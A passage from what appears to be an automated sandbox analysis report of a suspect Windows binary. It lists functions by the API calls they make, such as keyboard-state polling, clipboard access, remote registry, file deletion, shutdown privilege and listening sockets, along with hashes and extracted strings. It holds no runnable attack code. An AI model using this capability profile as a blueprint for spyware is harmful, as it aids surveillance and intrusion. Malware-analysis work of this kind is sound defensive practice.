                                  • Part of subcall function 00AF87E7: GetProcessHeap.KERNEL32(00000008,00AF8240,00000000,00000000,?,00AF8240,?), ref: 00AF87F3
                                  • Part of subcall function 00AF87E7: HeapAlloc.KERNEL32(00000000,?,00AF8240,?), ref: 00AF87FA
                                  • Part of subcall function 00AF87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00AF8240,?), ref: 00AF880B
                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00AF825B
                                • _memset.LIBCMT ref: 00AF8270
                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00AF828F
                                • GetLengthSid.ADVAPI32(?), ref: 00AF82A0
                                • GetAce.ADVAPI32(?,00000000,?), ref: 00AF82DD
                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00AF82F9
                                • GetLengthSid.ADVAPI32(?), ref: 00AF8316
                                • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00AF8325
                                • HeapAlloc.KERNEL32(00000000), ref: 00AF832C
                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00AF834D
                                • CopySid.ADVAPI32(00000000), ref: 00AF8354
                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00AF8385
                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00AF83AB
                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00AF83BF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                • String ID:
                                • API String ID: 3996160137-0
                                • Opcode ID: 7d759e3e1b25185ac518b3a272655d4bc55e5288f3771d3d6c382793feb9b172
                                • Instruction ID: 52eb5db706fbff69ff4156fa7f033d094b114aa0f93f4aca531a53e1d6ee236d
                                • Opcode Fuzzy Hash: 7d759e3e1b25185ac518b3a272655d4bc55e5288f3771d3d6c382793feb9b172
                                • Instruction Fuzzy Hash: CF615D7190021AABDF109F94DD45EFEBBB9FF04700F148229F915AB2A1DB399A05DB60
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID:
                                • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                • API String ID: 0-4052911093
                                • Opcode ID: eebfd8ed16693e7eaad72211a7bd3eb519f2339a8f501749ae178d8d8505374b
                                • Instruction ID: b245a4b6b38fdddf3b904e0ecd575e50ad7c2e875032d581fdf5e304500968b2
                                • Opcode Fuzzy Hash: eebfd8ed16693e7eaad72211a7bd3eb519f2339a8f501749ae178d8d8505374b
                                • Instruction Fuzzy Hash: EE725E75E00219DBDB24DF99C8807FEB7F5EF48310F1481AAE949EB291EB749941CB90
                                APIs
                                  • Part of subcall function 00B210A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B20038,?,?), ref: 00B210BC
                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B20737
                                  • Part of subcall function 00AA9997: __itow.LIBCMT ref: 00AA99C2
                                  • Part of subcall function 00AA9997: __swprintf.LIBCMT ref: 00AA9A0C
                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B207D6
                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00B2086E
                                • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00B20AAD
                                • RegCloseKey.ADVAPI32(00000000), ref: 00B20ABA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                • String ID:
                                • API String ID: 1240663315-0
                                • Opcode ID: b8708e2500839f3f0d6bf9320cf49a8570ebe4d6b88f6ca8008f2ced2a31172b
                                • Instruction ID: a2e1dc816a68b3a66bbdb64f6717d284cf2f14fb9849345ea9f49d07879c7b1d
                                • Opcode Fuzzy Hash: b8708e2500839f3f0d6bf9320cf49a8570ebe4d6b88f6ca8008f2ced2a31172b
                                • Instruction Fuzzy Hash: 2BE13D31214211AFCB14EF28D995E6BBBF9EF89714B04856DF44ADB2A2DB30ED01CB51
                                APIs
                                • GetKeyboardState.USER32(?), ref: 00B00241
                                • GetAsyncKeyState.USER32(000000A0), ref: 00B002C2
                                • GetKeyState.USER32(000000A0), ref: 00B002DD
                                • GetAsyncKeyState.USER32(000000A1), ref: 00B002F7
                                • GetKeyState.USER32(000000A1), ref: 00B0030C
                                • GetAsyncKeyState.USER32(00000011), ref: 00B00324
                                • GetKeyState.USER32(00000011), ref: 00B00336
                                • GetAsyncKeyState.USER32(00000012), ref: 00B0034E
                                • GetKeyState.USER32(00000012), ref: 00B00360
                                • GetAsyncKeyState.USER32(0000005B), ref: 00B00378
                                • GetKeyState.USER32(0000005B), ref: 00B0038A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: State$Async$Keyboard
                                • String ID:
                                • API String ID: 541375521-0
                                • Opcode ID: 218412bb06ebd0882c54bb30f86f093b030b23d9e7dba488d91e374d8353d0c7
                                • Instruction ID: 8affda913c9f80e9eaf3c3f2d709a1b42cfd5b753ff4575f764e108dfc6e8bab
                                • Opcode Fuzzy Hash: 218412bb06ebd0882c54bb30f86f093b030b23d9e7dba488d91e374d8353d0c7
                                • Instruction Fuzzy Hash: 89419C345147CA6EFF326A6484083B5BEE0EF26344F0881DDD9C6571C2DB9459C48796
                                APIs
                                  • Part of subcall function 00AA9997: __itow.LIBCMT ref: 00AA99C2
                                  • Part of subcall function 00AA9997: __swprintf.LIBCMT ref: 00AA9A0C
                                • CoInitialize.OLE32 ref: 00B18718
                                • CoUninitialize.OLE32 ref: 00B18723
                                • CoCreateInstance.OLE32(?,00000000,00000017,00B32BEC,?), ref: 00B18783
                                • IIDFromString.OLE32(?,?), ref: 00B187F6
                                • VariantInit.OLEAUT32(?), ref: 00B18890
                                • VariantClear.OLEAUT32(?), ref: 00B188F1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                • API String ID: 834269672-1287834457
                                • Opcode ID: 3f557fa78333ee065c6bf0249f71eca689871e4ca3c7700a9a9a2975e0c75416
                                • Instruction ID: 8927aad307242aeeb695b4aff37e7bb560299adc83eb1200f4085467f106ba55
                                • Opcode Fuzzy Hash: 3f557fa78333ee065c6bf0249f71eca689871e4ca3c7700a9a9a2975e0c75416
                                • Instruction Fuzzy Hash: EC618C706083019FD710DF64C984BABBBE4FF49714F504999F9859B2A1DB70ED88CB92
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                • String ID:
                                • API String ID: 1737998785-0
                                • Opcode ID: a386798f5bd0e77d62f50cba9c69447015dbdf0455fb32ee63fff281ace92856
                                • Instruction ID: 098d542c74692cb4926d992ce5f01e9530f3a9af5819c9250803561dfe45786c
                                • Opcode Fuzzy Hash: a386798f5bd0e77d62f50cba9c69447015dbdf0455fb32ee63fff281ace92856
                                • Instruction Fuzzy Hash: E3218B35200211AFDB21AF60ED49BBA77B9EF04750F10806AF946DB2B1DF74AD02CB54
                                APIs
                                  • Part of subcall function 00AA48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AA48A1,?,?,00AA37C0,?), ref: 00AA48CE
                                  • Part of subcall function 00B04CD3: GetFileAttributesW.KERNEL32(?,00B03947), ref: 00B04CD4
                                • FindFirstFileW.KERNEL32(?,?), ref: 00B03ADF
                                • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00B03B87
                                • MoveFileW.KERNEL32(?,?), ref: 00B03B9A
                                • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00B03BB7
                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B03BD9
                                • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00B03BF5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                • String ID: \*.*
                                • API String ID: 4002782344-1173974218
                                • Opcode ID: 879678eb6688e37a545f99af02fdb71ba06d1bd4a7a9b037c1fa4f78f40be3e7
                                • Instruction ID: 109442e9250642f19672cf8410be41be2eed3be635ca0f9dc18747844799ef85
                                • Opcode Fuzzy Hash: 879678eb6688e37a545f99af02fdb71ba06d1bd4a7a9b037c1fa4f78f40be3e7
                                • Instruction Fuzzy Hash: 76517F319012499ACF15EBA0CE969FEBBF9AF15704F6441A9E442770D1EF316F09CBA0
                                APIs
                                  • Part of subcall function 00AA7F41: _memmove.LIBCMT ref: 00AA7F82
                                • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00B0F6AB
                                • Sleep.KERNEL32(0000000A), ref: 00B0F6DB
                                • _wcscmp.LIBCMT ref: 00B0F6EF
                                • _wcscmp.LIBCMT ref: 00B0F70A
                                • FindNextFileW.KERNEL32(?,?), ref: 00B0F7A8
                                • FindClose.KERNEL32(00000000), ref: 00B0F7BE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                • String ID: *.*
                                • API String ID: 713712311-438819550
                                • Opcode ID: 89c51b4bc9bccb1fa704bf051f7d9084ad605f1a90f16f542e53a6ee14b90ee5
                                • Instruction ID: 055dcf68b99ca290c67a13e6afc0fb36a6bb544631435ede87bd9e72af60871e
                                • Opcode Fuzzy Hash: 89c51b4bc9bccb1fa704bf051f7d9084ad605f1a90f16f542e53a6ee14b90ee5
                                • Instruction Fuzzy Hash: FC415B71A0421A9BCF21DF64CD89AFEBBF4EF05350F1445A6E815A32E0EB319E45CB91
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID:
                                • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                • API String ID: 0-1546025612
                                • Opcode ID: dea3bd21e9f9c81c5ec2a5b10e1f69ff3a4e1942fedb777e10651fe5846711b2
                                • Instruction ID: 6963e6417b994c9b7a01d18c4f3823c4433184bc36fefafe8e3fe8bd927129cd
                                • Opcode Fuzzy Hash: dea3bd21e9f9c81c5ec2a5b10e1f69ff3a4e1942fedb777e10651fe5846711b2
                                • Instruction Fuzzy Hash: 4DA29E70E0425ACBDF24CF59C9907EDB7B5BF58314F2481AAD85AA7282E7349E81DF40
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: _memmove
                                • String ID:
                                • API String ID: 4104443479-0
                                • Opcode ID: 673f58b0ee803a0cc5d4c1b04fb851a6d975334b656d61f8c6e907c8b2ad9525
                                • Instruction ID: db2016c718d925c10f486fa3c01e6daaece333af27fc07bd7a7eadc0e7b2ca1a
                                • Opcode Fuzzy Hash: 673f58b0ee803a0cc5d4c1b04fb851a6d975334b656d61f8c6e907c8b2ad9525
                                • Instruction Fuzzy Hash: 6A125970E00609DBDF14DFA5DA85AEEB7F9FF48300F204669E406A7292EB35AD11CB50
                                APIs
                                  • Part of subcall function 00AF8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AF8D0D
                                  • Part of subcall function 00AF8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AF8D3A
                                  • Part of subcall function 00AF8CC3: GetLastError.KERNEL32 ref: 00AF8D47
                                • ExitWindowsEx.USER32(?,00000000), ref: 00B0549B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                • String ID: $@$SeShutdownPrivilege
                                • API String ID: 2234035333-194228
                                • Opcode ID: 6b29ad99fbcc66601557387cac5f47c0c0b262b20ae45eb74aacc63a7c20bc75
                                • Instruction ID: 860f934b0da0ffc016ff544f9e59e4f83ea91cf78e55347f7a9358f1e12093cb
                                • Opcode Fuzzy Hash: 6b29ad99fbcc66601557387cac5f47c0c0b262b20ae45eb74aacc63a7c20bc75
                                • Instruction Fuzzy Hash: CE014771654A066AF7386674DC8AFFF7AE8EB05743F2005F0FD07D26D6DA540C8089A0
                                APIs
                                • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00B165EF
                                • WSAGetLastError.WSOCK32(00000000), ref: 00B165FE
                                • bind.WSOCK32(00000000,?,00000010), ref: 00B1661A
                                • listen.WSOCK32(00000000,00000005), ref: 00B16629
                                • WSAGetLastError.WSOCK32(00000000), ref: 00B16643
                                • closesocket.WSOCK32(00000000,00000000), ref: 00B16657
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: ErrorLast$bindclosesocketlistensocket
                                • String ID:
                                • API String ID: 1279440585-0
                                • Opcode ID: 77941fe5ba4ff0e7c93d6606549633e5268cc5c1175647b29b83f0c63317f78e
                                • Instruction ID: 676c58ba87f32f143ce4f2ded072a8eb6bdaa841420afca1c8a46ebf2324d636
                                • Opcode Fuzzy Hash: 77941fe5ba4ff0e7c93d6606549633e5268cc5c1175647b29b83f0c63317f78e
                                • Instruction Fuzzy Hash: 81217E31600605DFCB10EF64C985ABEB7F9EF49720F1481A9F956A72E1CB70AD428B51
                                APIs
                                  • Part of subcall function 00AC0FF6: std::exception::exception.LIBCMT ref: 00AC102C
                                  • Part of subcall function 00AC0FF6: __CxxThrowException@8.LIBCMT ref: 00AC1041
                                • _memmove.LIBCMT ref: 00AF062F
                                • _memmove.LIBCMT ref: 00AF0744
                                • _memmove.LIBCMT ref: 00AF07EB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: _memmove$Exception@8Throwstd::exception::exception
                                • String ID:
                                • API String ID: 1300846289-0
                                • Opcode ID: defe86f6dfe2cc44166a70e32a4103c612b3fbcb5f1b5b62a238f10cbc3248e3
                                • Instruction ID: 33f2ef51877d2f0af4d45c47157a49d242e77c73361942657b92028b518a5d26
                                • Opcode Fuzzy Hash: defe86f6dfe2cc44166a70e32a4103c612b3fbcb5f1b5b62a238f10cbc3248e3
                                • Instruction Fuzzy Hash: 2A0260B0E00209DBDF04DFA4D981ABEBBB5EF44300F1580A9F906DB296EB35D955CB91
                                APIs
                                  • Part of subcall function 00AA2612: GetWindowLongW.USER32(?,000000EB), ref: 00AA2623
                                • DefDlgProcW.USER32(?,?,?,?,?), ref: 00AA19FA
                                • GetSysColor.USER32(0000000F), ref: 00AA1A4E
                                • SetBkColor.GDI32(?,00000000), ref: 00AA1A61
                                  • Part of subcall function 00AA1290: DefDlgProcW.USER32(?,00000020,?), ref: 00AA12D8
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: ColorProc$LongWindow
                                • String ID:
                                • API String ID: 3744519093-0
                                • Opcode ID: a792bb278b4250862165df32d83ea6fffa831599e96731b5c4f34077cc841c61
                                • Instruction ID: 45758e8227883697296a3ee2fde2973d1fa2c6fe26fb5a37e38b49cc424400d3
                                • Opcode Fuzzy Hash: a792bb278b4250862165df32d83ea6fffa831599e96731b5c4f34077cc841c61
                                • Instruction Fuzzy Hash: 6DA10371126554BEE728AB299C48EBF3AADEB47381F15011BF403D72D2CF248D01D2B6
                                APIs
                                  • Part of subcall function 00B180A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00B180CB
                                • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00B16AB1
                                • WSAGetLastError.WSOCK32(00000000), ref: 00B16ADA
                                • bind.WSOCK32(00000000,?,00000010), ref: 00B16B13
